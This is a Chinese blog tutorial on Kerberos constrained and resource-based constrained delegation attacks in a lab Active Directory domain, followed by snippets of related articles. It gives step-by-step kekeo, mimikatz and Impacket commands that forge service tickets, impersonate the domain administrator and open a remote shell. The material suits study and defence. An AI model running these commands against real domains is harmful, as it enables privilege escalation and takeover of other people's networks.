约束性委派攻击和非约束性委派攻击

已于 2025-02-20 19:37:35 修改
阅读量799 收藏 5
点赞数 9
CC 4.0 BY-SA版权
文章标签: python 开发语言 网络安全 安全 web安全
于 2025-02-20 19:35:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/anddddoooo/article/details/145761448

约束性委派机制可见:域内的三种委派方式_域控委派控制任务-CSDN博客

约束性委派

  • 提前在 deandean 用户上配置好 对 cifs/WIN-0V0GAORDC17.HACKER.com 服务的约束性委派。

  • 使用约束性委派机制,以管理员权限访问 cifs/WIN-0V0GAORDC17.HACKER.com 服务。

  1. 请求 deandean 普通用户的 tgt (在 kekeo 中运行)。

tgt::ask /user:deandean /domain:HACKER.com /password:p-0p-0p-0p-0
​
# kekeo 将 tgt 存放在当前文件夹下。

  1. 使用 tgt 请求 S4U2Self 票据。同时再使用 S4U2Self 票据请求 S4U2Proxy 票据。(在 kekeo 中运行)。

tgs::s4u /tgt:TGT_deandean@HACKER.COM_krbtgt~HACKER.com@HACKER.COM.kirbi /user:administrator@HACKER.com /service:cifs/WIN-0V0GAORDC17.HACKER.com
​
# kekeo 将 S4U2Self 票据(短的)和 S4U2Proxy 票据(长的)保存到当前文件夹。

  1. 使用 mimikatz 将 st 服务票据(S4U2Proxy 票据)导入会话 (在 mimikatz 中运行)。

kerberos::ptt TGS_administrator@HACKER.com@HACKER.COM_cifs~WIN-0V0GAORDC17.HACKER.com@HACKER.COM.kirbi

  1. 以管理员权限获得访问域控服务的 shell 。

dir \\WIN-0V0GAORDC17.HACKER.com\c$

如下图是 mimikatz 的票据列表,就是我们的 S4U2Proxy 票据。

基于资源的约束性委派

  • 这里演示的攻击域内机器 WIN10-01,使得我们有管理员权限访问 WIN10-01。

  • WIN10-01 是 deandean 用户加入域的,所以有修改这个机器账户的 msDS-AllowedToActOnBehalfOfOtherIdentity 属性的权限,这是基于资源的约束性委派攻击的必要条件。

  • 如果你要攻击域控,那么你需要有修改域控的 msDS-AllowedToActOnBehalfOfOtherIdentity 属性的权限,我们普通域用户没有修改此属性的权限。

  1. 设置密码创建一个新的机器账户 win10-02$ 。

# 密码为 p-0p-0p-0p-0
addcomputer.py -computer-name win10-02$ -computer-pass p-0p-0p-0p-0 -dc-ip 192.168.72.163 HACKER.com/deandean:p-0p-0p-0p-0

  1. 在 WIN10-01 上配置 win10-02 的基于资源的约束性委派(基于资源的约束性委派配置在下游机器账户上, WIN10-01 属于下游机器, win10-02 属于上游机器)。

rbcd.py -f win10-02 -t WIN10-01 -dc-ip 192.168.72.163 HACKER\\deandean:p-0p-0p-0p-0

如下图可以看到 WIN10-01 上配置的基于资源的约束性委派。

  1. 使用 win10-02 身份代表 administrator 身份获取访问 WIN10-01 的服务票据。

getST.py -spn cifs/WIN10-01.HACKER.com -impersonate administrator -dc-ip 192.168.72.163 HACKER.com/win10-02$:p-0p-0p-0p-0

  1. 使用此服务票据访问 WIN10-01 (windows 上攻击会显示 “ [-] module 'readline' has no attribute 'backend' ” 报错,但在 linux 上不会出现此报错)。

export KRB5CCNAME=/tmp/administrator@cifs_WIN10-01.HACKER.com@HACKER.COM.ccache
​
python smbexec.py -no-pass -k WIN10-01.HACKER.com

约束委派攻击原理与利用
渗透之路,攻防之间皆学问
04-11 7581
约束委派攻击主要利用了Windows域环境中的Kerberos协议及其扩展S4U(Service for User to SelfService for User to Proxy)机制。约束委派是微软在Windows Server 2003中引入的一种安全机制,旨在限制服务账户在模拟用户时仅能访问特定的服务,而所有服务。这一机制通过Kerberos协议的S4U2SelfS4U2Proxy两个子协议实现。
基于资源的约束委派攻击
渗透之路,攻防之间皆学问
04-13 2405
首先,在传统的约束委派中,情况是这样的:有一个服务账户(比如一个Web服务器),它被配置为可以代表某个用户(比如一个域用户)去访问另一个服务(比如数据库)。这就像是你给了你的秘书(服务账户)一张你的身份证(用户的凭证),让她去帮你办点事(访问数据库)。
约束委派攻击
blue_fantasy的博客
01-25 4172
Text. 0x00 原理 回顾 首先回顾一下什么是委派? 服务/用户 主机名 用户A hostA 服务B hostB 服务C hostC 委派就是用户A委派主机hostB上的服务代表自己去访问了主机hostC上的服务C,委派需要提前在域控上进行配置,它可以理解成是一种权限。 约束性委派原理 由于⾮约束委派的不安全性(配置了⾮约束
Kerberos 域委派攻击约束性委派
Adminxe的博客
03-06 514
CSDN自动博客文章迁移由于约束性委派的不安全性,微软在 Windows Server 2003 中引入了约束委派。区别在于不会直接把 TGT 给服务,所发送的认证信息中包含了允许访问的服务,即不允许服务代表用户去访问其他服务。同时为了在 Kerberos 协议层面对约束性委派的支持, 微软扩展了两个子协议:S4U2SelfS4U2ProxyS4U2Self可以代表自身请求针对其自身的 Kerberos 服务票据STS4U2Proxy。
域渗透委派攻击之约束委派
qq_56426046的博客
11-13 1009
(7) 如果请求中包含 PAC,则 KDC 通过检查 PAC 的签名数据来验证 PAC ,如果 PAC 有效或不存在,则 KDC 返回 ST2 给 service1,但存储在 ST2 的 cname crealm 字段中的客户端身份是用户的身份,而不是 service1 的身份。不同于允许委派所有服务的约束委派,约束委派的目的是在模拟用户的同时,限制委派机器/帐户对特定服务的访问。已知在约束委派的情况下,服务用户只能获取某个用户或者主机的服务ST,只能用模拟用户访问特定的服务,
Kerberos 域委派攻击之基于资源的约束性委派
Adminxe的博客
03-06 835
CSDN自动迁移博客文章注意区别:约束性委派 不能跨域进行委派,基于资源的约束性委派可以跨域林如果约束性委派,必须拥有权限,该特权是敏感的,通常仅授予域管理员。为了使用户/资源更加独立,Windows Server 2012 中引入了基于资源的约束委派。基于资源的约束性委派不需要域管理员权限去设置,而是把设置属性的权限赋予给了机器自身。基于资源的约束性委派允许资源配置受信任的帐户委派给他们。基于资源的约束性委派只能在运行 ·Windows Server 2012 及以上的域控制器·上配置,
rubeus+spoolsample.zip域渗透约束性委派攻击实验
08-19
以下是关于约束性委派攻击以及相关工具“Rubeus”“SpoolSample”的详细解释。 约束性委派是微软活动目录(Active Directory)中的一个功能,它允许一个经过身份验证的用户代表其他用户进行身份验证。在某些...
内网渗透—横向移动&约束委派&约束委派
最新发布
2301_76227305的博客
09-06 1145
约束委派约束委派的最大区别就是,一个是信任此计算机的任何委派,一个只是信任指定委派。从实际运用来说,约束委派由于要让DC进行连接才能获得票据,所以有点鸡肋,就不如约束委派。其实说来说去,本质都是票据的伪造,然后进行票据传递。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
域内渗透约束委派
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
09-20 3438
域渗透约束委派的利用
windows中关于委派(delegation)的理解
热门推荐
Shanfenglan's blog
09-24 17万+
CATALOG前言委派一些问题S4U2SELF延伸S4U2PROXY约束性委派约束性委派基于资源的约束性委派基于委派攻击约束委派攻击约束委派攻击基于资源的约束委派攻击 前言 委派一般出现在域环境中。它是一种机制,在kerberos认证的时候会涉及到。不正确的委派的配置,可能使攻击者达到提权的目的。 委派 假设域内用户A需要访问服务器B,并需要以A的身份对服务器的端数据库进行更改。则A就会进行一个kerberos认证,来获取访问B的ticket。这时候就需要用到委派,也就是说,A依旧访问B且只申请一个访
Kerbeeros-束性委派攻击
m0_75218183的博客
06-11 1053
对于约束性委派,服务账户只能获取该用户对指定服务的ST,从而只能模拟该用户访问特定的服务。配置了约束性委派账户的msDS-AllowedToDelegateTo 属性会指定对哪个SPN进行委派约束性委派的设置需要SeEnableDelegationPrivilege特权,该特权默认仅授予域管理员企业管理员。
域控-笔记三(约束委派攻击,约束委派攻击
5L2g556F5ZWl77yf
11-25 3724
文章目录一. 域委派1.1 域委派分类1.2 委派流程1.3 使用委派条件1.4 委派的一些原理二. 委派攻击2.1 约束委派攻击本地环境约束委派的查找 一. 域委派 1.1 域委派分类 约束委派(Unconstrained delegation) 服务账号可以获取被委派用户的TGT,并将TGT缓存到LSASS进程中,从而服务账号可使用该TGT,模拟用户访问任意服务。配置了约束委派的账户的userAccountControl 属性有个FLAG位 WORKSTATION_TRUSTED_FOR_DE
135&136-横向移动&约束委派&约束委派&资源约束委派&数据库攻防
dreamer292的博客
08-24 754
约束委派相关的知识是域内很重要的点
内网横向移动—约束委派&约束委派
剁椒鱼头没剁椒的博客
08-01 960
在Windows 2000 Server首次发布Active Directory时,Microsoft必须提供一种简单的机制来支持用户通过kerberos向web server进行身份验证并需要代表该用户更新后端数据库服务器上的记录的方案。这通常称为"kerberos双跳问题",并且要求进行委派,以便web server在修改数据库记录时模拟用户。
域内安全委派攻击
8888的博客
08-30 1787
攻击角度来说:如果攻击者拿到了一台配置了约束委派的机器权限,可以诱导管理员来访问该机器,然后可以得到管理员的TGT,从而模拟管理员访问任意服务,相当于拿下了整个域环境,或者结合打印机漏洞让域管用户强制回连以缓存 TGT,一个域内用户访问WEB服务,但是一些资源在文件服务上,这个时候就需要委派,需要web系统代表用户A去访问文件服务的资源。3、这个时候如果域管访问了机器我们的内存中就会有域管的TGT,就可以访问任意机器了,在与域控上执行访问(在域控上执行)
基于windows中委派攻击思路(下)-基于资源的约束性委派
Shanfenglan's blog
12-16 4万+
文章目录1. 前言2. 技术点2.1 利用原理:那么如何获得一个机器账户呢?如何获得一个有权利修改msDS-AllowedToActOnBehalfOfOtherIdentity?3. 利用过程:1. 利用powermad添加机器账户:2. 查询添加的机器账户的sid3. 修改msDS-AllowedToActOnBehalfOfOtherIdentity:3.1 win server 2012以上:3.2 win server 2012以下:4. 利用rubues获取票据5.利用impacket 1. 前
Kerberos域安全系列(24)-基于域委派的测试
prettyX的博客
05-18 387
委派委派是大型网络中经常部署的应用模式,给多跳认证带来很大的便利,同时也带来很大的安全隐患,利用委派可获取域管理员权限,甚至制作深度隐藏的后门 域委派是指,将域内用户的权限委派给服务账号,使得服务账号能以用户权限开展域内活动。 服务账号(Service Account):域内用户的一种类型,服务器运行服务时所用的账号,将服务运行起来并加入域。例如MS SQL Server在安装时,会在域内自动注册服务账号Sql Service Account,这类账号不能用于交互式登录。 一个域内普通.
域渗透实验:约束性委派攻击工具解析
SpoolSample.exe是一个较小的、较不常见的工具,它用于展示如何利用约束性委派打印机服务(例如spoolss服务)来进行攻击。在某些旧的Windows版本中,打印机服务默认配置为约束性委派,这可以被攻击者利用来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值